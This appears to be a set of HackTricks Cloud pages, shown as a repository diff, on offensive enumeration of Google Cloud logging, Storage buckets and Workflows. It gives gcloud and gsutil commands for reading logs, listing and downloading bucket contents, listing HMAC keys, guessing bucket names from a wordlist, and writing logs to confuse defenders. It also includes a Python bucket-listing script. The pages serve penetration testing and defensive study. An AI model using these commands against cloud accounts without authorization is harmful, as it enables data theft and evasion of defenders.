* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## [Stackdriver logging](https://cloud.google.com/sdk/gcloud/reference/logging/)
[**Stackdriver**](https://cloud.google.com/stackdriver/) is recognized as a comprehensive infrastructure **logging suite** offered by Google. It has the capability to capture sensitive data through features like syslog, which reports individual commands executed inside Compute Instances. Furthermore, it monitors HTTP requests sent to load balancers or App Engine applications, network packet metadata within VPC communications, and more.
For a Compute Instance, the corresponding service account requires merely **WRITE** permissions to facilitate logging of instance activities. Nonetheless, it's possible that an administrator might **inadvertently** provide the service account with both **READ** and **WRITE** permissions. In such instances, the logs can be scrutinized for sensitive information.
To accomplish this, the [gcloud logging](https://cloud.google.com/sdk/gcloud/reference/logging/) utility offers a set of tools. Initially, identifying the types of logs present in your current project is recommended.
```bash
# List logs
gcloud logging logs list
# Read logs
gcloud logging read [FOLDER]
# Write logs
# An attacker writing logs may confuse the Blue Team
gcloud logging write [FOLDER] [MESSAGE]
# List Buckets
gcloud logging buckets list
```
## References
* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging)
* [https://initblog.com/2020/gcp-post-exploitation/](https://initblog.com/2020/gcp-post-exploitation/)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

181
pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.md Normal file
View File

@@ -0,0 +1,181 @@
# GCP - Storage Enum
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Storage
Google Cloud Platform (GCP) Storage is a **cloud-based storage solution** that provides highly durable and available object storage for unstructured data. It offers **various storage classes** based on performance, availability, and cost, including Standard, Nearline, Coldline, and Archive. GCP Storage also provides advanced features such as **lifecycle policies, versioning, and access control** to manage and secure data effectively.
The bucket can be stored in a region, in 2 regions or **multi-region (default)**.
### Storage Types
* **Standard Storage**: This is the default storage option that **offers high-performance, low-latency access to frequently accessed data**. It is suitable for a wide range of use cases, including serving website content, streaming media, and hosting data analytics pipelines.
* **Nearline Storage**: This storage class offers **lower storage costs** and **slightly higher access costs** than Standard Storage. It is optimized for infrequently accessed data, with a minimum storage duration of 30 days. It is ideal for backup and archival purposes.
* **Coldline Storage**: This storage class is optimized for **long-term storage of infrequently accessed data**, with a minimum storage duration of 90 days. It offers the **lower storage costs** than Nearline Storage, but with **higher access costs.**
* **Archive Storage**: This storage class is designed for cold data that is accessed **very infrequently**, with a minimum storage duration of 365 days. It offers the **lowest storage costs of all GCP storage options** but with the **highest access costs**. It is suitable for long-term retention of data that needs to be stored for compliance or regulatory reasons.
* **Autoclass**: If you **don't know how much you are going to access** the data you can select Autoclass and GCP will **automatically change the type of storage for you to minimize costs**.
### Access Control
By **default** it's **recommended** to control the access via **IAM**, but it's also possible to **enable the use of ACLs**.\
If you select to only use IAM (default) and **90 days passes**, you **won't be able to enable ACLs** for the bucket.
### Versioning
It's possible to enable versioning, this will **save old versions of the file inside the bucket**. It's possible to configure the **number of versions you want to keep** and even **how long** you want **noncurrent** versions (old versions) to live. Recommended is **7 days for Standard type**.
The **metadata of a noncurrent version is kept**. Moreover, **ACLs of noncurrent versions are also kept**, so older versions might have different ACLs from the current version.
Learn more in the [**docs**](https://cloud.google.com/storage/docs/object-versioning).
### Retention Policy
Indicate how **long** you want to **forbid the deletion of Objects inside the bucket** (very useful for compliance at least).\
Only one of **versioning or retention policy can be enabled at the same time**.
### Encryption
By default objects are **encrypted using Google managed keys**, but you could also use a **key from KMS**.
### Public Access
It's possible to give **external users** (logged in GCP or not) **access to buckets content**.\
By default, when a bucket is created, it will have **disabled the option to expose publicly** the bucket, but with enough permissions the can be changed.
The **format of an URL** to access a bucket is **`https://storage.googleapis.com/<bucket-name>` or `https://<bucket_name>.storage.googleapis.com`** (both are valid).
### HMAC Keys
An HMAC key is a type of _credential_ and can be **associated with a service account or a user account in Cloud Storage**. You use an HMAC key to create _signatures_ which are then included in requests to Cloud Storage. Signatures show that a **given request is authorized by the user or service account**.
HMAC keys have two primary pieces, an _access ID_ and a _secret_.
* **Access ID**: An alphanumeric string linked to a specific service or user account. When linked to a service account, the string is 61 characters in length, and when linked to a user account, the string is 24 characters in length. The following shows an example of an access ID:
`GOOGTS7C7FUP3AIRVJTE2BCDKINBTES3HC2GY5CBFJDCQ2SYHV6A6XXVTJFSA`
* **Secret**: A 40-character Base-64 encoded string that is linked to a specific access ID. A secret is a preshared key that only you and Cloud Storage know. You use your secret to create signatures as part of the authentication process. The following shows an example of a secret:
`bGoa+V7g/yqDXvKRqq+JTFn4uQZbPiQJo4pf9RzJ`
Both the **access ID and secret uniquely identify an HMAC key**, but the secret is much more sensitive information, because it's used to **create signatures**.
### Enumeration
```bash
# List all storage buckets in project
gsutil ls
# Get each bucket configuration (protections, CLs, times, configs...)
gsutil ls -L
# List contents of a specific bucket
gsutil ls gs://bucket-name/
gsutil ls -r gs://bucket-name/ # Recursive
gsutil ls -a gs://bucket-name/ # Get ALL versions of objects
# Cat the context of a file without copying it locally
gsutil cat 'gs://bucket-name/folder/object'
gsutil cat 'gs://bucket-name/folder/object#<num>' # cat specific version
# Copy an object from the bucket to your local storage for review
gsutil cp gs://bucket-name/folder/object ~/
# List using a raw OAuth token
## Useful because "CLOUDSDK_AUTH_ACCESS_TOKEN" and "gcloud config set auth/access_token_file" doesn't work with gsutil
curl -H "Authorization: Bearer $TOKEN" "https://storage.googleapis.com/storage/v1/b/<storage-name>/o"
# Download file content from bucket
curl -H "Authorization: Bearer $TOKEN" "https://storage.googleapis.com/storage/v1/b/supportstorage-58249/o/flag.txt?alt=media" --output -
# Enumerate HMAC keys
gsutil hmac list
# Get permissions
gcloud storage buckets get-iam-policy gs://bucket-name/
gcloud storage objects get-iam-policy gs://bucket-name/folder/object
```
If you get a permission denied error listing buckets you may still have access to the content. So, now that you know about the name convention of the buckets you can generate a list of possible names and try to access them:
```bash
for i in $(cat wordlist.txt); do gsutil ls -r gs://"$i"; done
```
With permissions `storage.objects.list` and `storage.objects.get`, you should be able to enumerate all folders and files from the bucket in order to download them. You can achieve that with this Python script:
```python
import requests
import xml.etree.ElementTree as ET
def list_bucket_objects(bucket_name, prefix='', marker=None):
url = f"https://storage.googleapis.com/{bucket_name}?prefix={prefix}"
if marker:
url += f"&marker={marker}"
response = requests.get(url)
xml_data = response.content
root = ET.fromstring(xml_data)
ns = {'ns': 'http://doc.s3.amazonaws.com/2006-03-01'}
for contents in root.findall('.//ns:Contents', namespaces=ns):
key = contents.find('ns:Key', namespaces=ns).text
print(key)
next_marker = root.find('ns:NextMarker', namespaces=ns)
if next_marker is not None:
next_marker_value = next_marker.text
list_bucket_objects(bucket_name, prefix, next_marker_value)
list_bucket_objects('<storage-name>')
```
### Privilege Escalation
In the following page you can check how to **abuse storage permissions to escalate privileges**:
{% content-ref url="../gcp-privilege-escalation/gcp-storage-privesc.md" %}
[gcp-storage-privesc.md](../gcp-privilege-escalation/gcp-storage-privesc.md)
{% endcontent-ref %}
### Unauthenticated Enum
{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/" %}
[gcp-storage-unauthenticated-enum](../gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/)
{% endcontent-ref %}
### Post Exploitation
{% content-ref url="../gcp-post-exploitation/gcp-storage-post-exploitation.md" %}
[gcp-storage-post-exploitation.md](../gcp-post-exploitation/gcp-storage-post-exploitation.md)
{% endcontent-ref %}
### Persistence
{% content-ref url="../gcp-persistence/gcp-storage-persistence.md" %}
[gcp-storage-persistence.md](../gcp-persistence/gcp-storage-persistence.md)
{% endcontent-ref %}
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

67
pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.md Normal file
View File

@@ -0,0 +1,67 @@
# GCP - Workflows Enum
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Basic Information
**Google Cloud Platform (GCP) Workflows** is a service that helps you automate tasks that involve **multiple steps** across Google Cloud services and other web-based services. Think of it as a way to set up a **sequence of actions** that run on their own once triggered. You can design these sequences, called workflows, to do things like process data, handle software deployments, or manage cloud resources without having to manually oversee each step.
### Encryption
Related to encryption, by default the **Google-managed encryption key is use**d but it's possible to make it use a key of by customers.
## Enumeration
{% hint style="danger" %}
You can also check the output of previous executions to look for sensitive information
{% endhint %}
{% code overflow="wrap" %}
```bash
# List Workflows
gcloud workflows list
# Get info and yaml of an specific workflow
gcloud workflows describe <workflow-name>
# List executions
gcloud workflows executions list workflow-1
# Get execution info and output
gcloud workflows executions describe projects/<proj-number>/locations/<location>/workflows/<workflow-name>/executions/<execution-id>
```
{% endcode %}
### Privesc and Post Exploitation
{% content-ref url="../gcp-privilege-escalation/gcp-workflows-privesc.md" %}
[gcp-workflows-privesc.md](../gcp-privilege-escalation/gcp-workflows-privesc.md)
{% endcontent-ref %}
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}